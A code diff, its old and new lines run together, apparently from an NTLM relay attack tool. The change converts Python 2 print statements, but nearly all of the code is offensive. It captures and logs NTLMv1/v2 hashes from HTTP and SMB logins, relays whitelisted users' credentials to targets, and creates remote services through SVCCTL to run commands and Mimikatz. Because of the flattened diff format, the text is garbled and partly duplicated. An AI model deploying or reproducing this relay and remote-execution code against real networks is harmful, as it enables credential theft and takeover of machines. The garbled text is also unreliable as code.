@ -84,12 +84,12 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd):
raise raise
def ServeOPTIONS(data): def ServeOPTIONS(data):
WebDav= re.search('OPTIONS', data) WebDav= re.search('OPTIONS', data)
if WebDav: if WebDav:
Buffer = WEBDAV_Options_Answer() Buffer = WEBDAV_Options_Answer()
return str(Buffer) return str(Buffer)
return False return False
def IsSMBAnonymous(data): def IsSMBAnonymous(data):
SSPIStart = data.find('NTLMSSP') SSPIStart = data.find('NTLMSSP')
@ -101,168 +101,168 @@ def IsSMBAnonymous(data):
return False return False
def ParseHTTPHash(data, key, client, UserToRelay, Host, Pivoting): def ParseHTTPHash(data, key, client, UserToRelay, Host, Pivoting):
LMhashLen = struct.unpack('<H',data[12:14])[0] LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0] LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper() LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24: NthashLen = struct.unpack('<H',data[20:22])[0]
HostNameLen = struct.unpack('<H',data[46:48])[0] NthashOffset = struct.unpack('<H',data[24:26])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0] NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex")) UserLen = struct.unpack('<H',data[36:38])[0]
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User) UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
if client == Host: if client == Host:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail." print ("[+] Attempting reflective NTLM Relay, this is likely to fail." )
else: else:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))) print ("[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if ('!' + User) in UserToRelay: if ('!' + User) in UserToRelay:
print "[+] Username: %s is blacklisted, dropping connection." % User print ("[+] Username: %s is blacklisted, dropping connection." % User)
return None, None return None, None
elif User in UserToRelay or "ALL" in UserToRelay: elif User in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1": if Pivoting[0] == "1":
return User, Domain return User, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(User) print ("[+] Username: %s is whitelisted, forwarding credentials."%(User))
if ReadData("SMBRelay-Session.txt", client, User, HostName, Host, cmd=None): if ReadData("SMBRelay-Session.txt", client, User, HostName, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts. ##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None return None, None
else: else:
return User, HostName return User, HostName
else: else:
print "[+] Username: %s not in target list, dropping connection."%(User) print ("[+] Username: %s not in target list, dropping connection."%(User))
return None, None return None, None
if NthashLen > 24: if NthashLen > 24:
DomainLen = struct.unpack('<H',data[28:30])[0] DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0] DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','') Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0] HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0] HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','') HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:]) WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User) WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
if client == Host: if client == Host:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail." print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else: else:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))) print ("[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if User in UserToRelay or "ALL" in UserToRelay: if User in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1": if Pivoting[0] == "1":
return User, Domain return User, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(User) print ("[+] Username: %s is whitelisted, forwarding credentials."%(User))
if ReadData("SMBRelay-Session.txt", client, User, Domain, Host, cmd=None): if ReadData("SMBRelay-Session.txt", client, User, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts. ##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None return None, None
else: else:
return User, Domain return User, Domain
else: else:
print "[+] Username: %s not in target list, dropping connection."%(User) print ("[+] Username: %s not in target list, dropping connection."%(User))
return None, None return None, None
def ParseSMBHash(data,client, challenge,UserToRelay,Host,Pivoting): #Parse SMB NTLMSSP v1/v2 def ParseSMBHash(data,client, challenge,UserToRelay,Host,Pivoting): #Parse SMB NTLMSSP v1/v2
SSPIStart = data.find('NTLMSSP') SSPIStart = data.find('NTLMSSP')
SSPIString = data[SSPIStart:] SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0] LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0] LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper() LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0] NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0] NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if NthashLen == 24: if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0] DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0] DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE') Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0] UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0] UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE') Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, challenge.encode("hex")) WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, challenge.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username) WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if client == Host: if client == Host:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail." print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else: else:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))) print ("[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if Username in UserToRelay or "ALL" in UserToRelay: if Username in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1": if Pivoting[0] == "1":
return Username, Domain return Username, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(Username) print ("[+] Username: %s is whitelisted, forwarding credentials."%(Username))
if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None): if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts. ##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None return None, None
else: else:
return Username, Domain return Username, Domain
else: else:
print "[+] Username: %s not in target list, dropping connection."%(Username) print ("[+] Username: %s not in target list, dropping connection."%(Username))
return None, None return None, None
if NthashLen > 60: if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0] DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0] DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE') Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0] UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0] UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE') Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, challenge.encode("hex"), SMBHash[:32], SMBHash[32:]) WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, challenge.encode("hex"), SMBHash[:32], SMBHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username) WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if client == Host: if client == Host:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail." print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else: else:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))) print ("[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if Username in UserToRelay or "ALL" in UserToRelay: if Username in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1": if Pivoting[0] == "1":
return Username, Domain return Username, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(Username) print ("[+] Username: %s is whitelisted, forwarding credentials."%(Username))
if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None): if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts. ##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None return None, None
else: else:
return Username, Domain return Username, Domain
else: else:
print "[+] Username: %s not in target list, dropping connection."%(Username) print ("[+] Username: %s not in target list, dropping connection."%(Username))
return None, None return None, None
#Get the index of the dialect we want. That is NT LM 0.12. #Get the index of the dialect we want. That is NT LM 0.12.
def Parse_Nego_Dialect(data): def Parse_Nego_Dialect(data):
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]]) Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
for i in range(0, 16): for i in range(0, 16):
if Dialect[i] == 'NT LM 0.12': if Dialect[i] == 'NT LM 0.12':
return chr(i) + '\x00' return chr(i) + '\x00'
def ExtractSMBChallenge(data, Pivoting): def ExtractSMBChallenge(data, Pivoting):
SSPIStart = data.find('NTLMSSP') SSPIStart = data.find('NTLMSSP')
@ -271,7 +271,7 @@ def ExtractSMBChallenge(data, Pivoting):
if Pivoting[0] == "1": if Pivoting[0] == "1":
return Challenge return Challenge
else: else:
print "[+] Setting up SMB relay with SMB challenge:", Challenge.encode("hex") print ("[+] Setting up SMB relay with SMB challenge:", Challenge.encode("hex"))
return Challenge return Challenge
def ExtractHTTPChallenge(data,Pivoting): def ExtractHTTPChallenge(data,Pivoting):
@ -283,7 +283,7 @@ def ExtractHTTPChallenge(data,Pivoting):
if Pivoting[0] == "1": if Pivoting[0] == "1":
return Challenge return Challenge
else: else:
print "[+] Setting up HTTP relay with SMB challenge:", Challenge.encode("hex") print ("[+] Setting up HTTP relay with SMB challenge:", Challenge.encode("hex"))
return Challenge return Challenge
#Here we extract the complete NTLM message from an HTTP request and we will later feed it to our SMB target. #Here we extract the complete NTLM message from an HTTP request and we will later feed it to our SMB target.
@ -296,7 +296,7 @@ def ExtractRawNTLMPacket(data):
#Is this a Guest sessions? #Is this a Guest sessions?
def GetSessionResponseFlags(data): def GetSessionResponseFlags(data):
if data[41:43] == "\x01\x00": if data[41:43] == "\x01\x00":
print "[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful.." print ("[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful..")
#Keeps our connection alive. #Keeps our connection alive.
def SMBKeepAlive(s, data): def SMBKeepAlive(s, data):
@ -344,7 +344,7 @@ def FindLocalIp():
IP = s.getsockname()[0] IP = s.getsockname()[0]
s.close() s.close()
except: except:
print "It seems like you're not connected to any network.." print ("It seems like you're not connected to any network..")
IP = '127.0.0.1' IP = '127.0.0.1'
s.close() s.close()
return IP return IP
@ -364,7 +364,7 @@ def ConvertToClassC(Host, Class):
Ip[6:7] = ["0"] Ip[6:7] = ["0"]
return ''.join(Ip)+Class return ''.join(Ip)+Class
else: else:
print "Illegal class, please use: /24 or /16" print ("Illegal class, please use: /24 or /16")
return None return None
def GenerateRandomFileName(): def GenerateRandomFileName():
@ -510,7 +510,7 @@ def BindCall(UID, Version, File, data, s):
## Fail Handling. ## Fail Handling.
if data[8:10] == "\xa2\x22": if data[8:10] == "\xa2\x22":
print "[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n" print ("[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## Fail Handling. ## Fail Handling.
@ -582,14 +582,14 @@ def MimiKatzRPC(Command, f, host, data, s):
#First Packet from output contains the complete len of what's coming, don't print it. #First Packet from output contains the complete len of what's coming, don't print it.
LenOut = len(ExtractRPCCommandOutput(data)) LenOut = len(ExtractRPCCommandOutput(data))
Output = ExtractRPCCommandOutput(data)[12:LenOut-9] Output = ExtractRPCCommandOutput(data)[12:LenOut-9]
print Output print (Output)
return data,s,f return data,s,f
##Do large RPC reads.. ##Do large RPC reads..
if data[8:10] == "\x2e\x05": if data[8:10] == "\x2e\x05":
buffsize = 1024 buffsize = 1024
filesize = struct.unpack('<i', data[96:100])[0]*2 filesize = struct.unpack('<i', data[96:100])[0]*2
print 'File size: %s'%(GetReadableSize(filesize)) print ('File size: %s'%(GetReadableSize(filesize)))
dataoffset = 0 dataoffset = 0
start_time = time.time() start_time = time.time()
##First Packet from output contains the complete len of what's coming, don't print it. ##First Packet from output contains the complete len of what's coming, don't print it.
@ -617,10 +617,10 @@ def MimiKatzRPC(Command, f, host, data, s):
Seconds = (time.time() - start_time) Seconds = (time.time() - start_time)
if Seconds>60: if Seconds>60:
minutes = Seconds/60 minutes = Seconds/60
print 'Fetched in: %.3g minutes.'%(minutes) print ('Fetched in: %.3g minutes.'%(minutes))
if Seconds<60: if Seconds<60:
print 'Fetched in: %.3g seconds'%(Seconds) print ('Fetched in: %.3g seconds'%(Seconds))
print "Output:\n", Output print ("Output:\n", Output)
return data,s,f return data,s,f
###################################### ######################################
@ -643,7 +643,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
##Error handling. ##Error handling.
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## DCE/RPC Create Service. ## DCE/RPC Create Service.
@ -660,12 +660,12 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
buffer1 = longueur(packet0)+packet0 buffer1 = longueur(packet0)+packet0
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
#print "[+] Creating service" #print ("[+] Creating service")
## DCE/RPC SVCCTLOpenService. ## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n" print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[88:108] ContextHandlerService = data[88:108]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -683,7 +683,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLStartService. ## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n" print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandler = data[84:104] ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -700,7 +700,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLQueryService. ## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n" print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -720,7 +720,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLCloseService ## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n" print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -754,13 +754,13 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
##Error handling. ##Error handling.
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService. ## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n" print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[84:104] ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -778,7 +778,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLControlService, stop operation. ## DCE/RPC SVCCTLControlService, stop operation.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n" print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[84:104] ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -795,7 +795,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLDeleteService. ## DCE/RPC SVCCTLDeleteService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to stop the service.\n" print ("[+] Failed to stop the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService)
@ -811,7 +811,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLCloseService ## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to delete the service.\n" print ("[+] Failed to delete the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -846,7 +846,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
##Error handling. ##Error handling.
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## DCE/RPC Create Service. ## DCE/RPC Create Service.
@ -863,12 +863,12 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
buffer1 = longueur(packet0)+packet0 buffer1 = longueur(packet0)+packet0
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
#print "[+] Creating service" #print ("[+] Creating service")
## DCE/RPC SVCCTLOpenService. ## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n" print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[88:108] ContextHandlerService = data[88:108]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -886,7 +886,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLStartService. ## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n" print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandler = data[84:104] ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -903,7 +903,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLQueryService. ## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n" print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -923,7 +923,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLControlService, stop operation. ## DCE/RPC SVCCTLControlService, stop operation.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n" print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
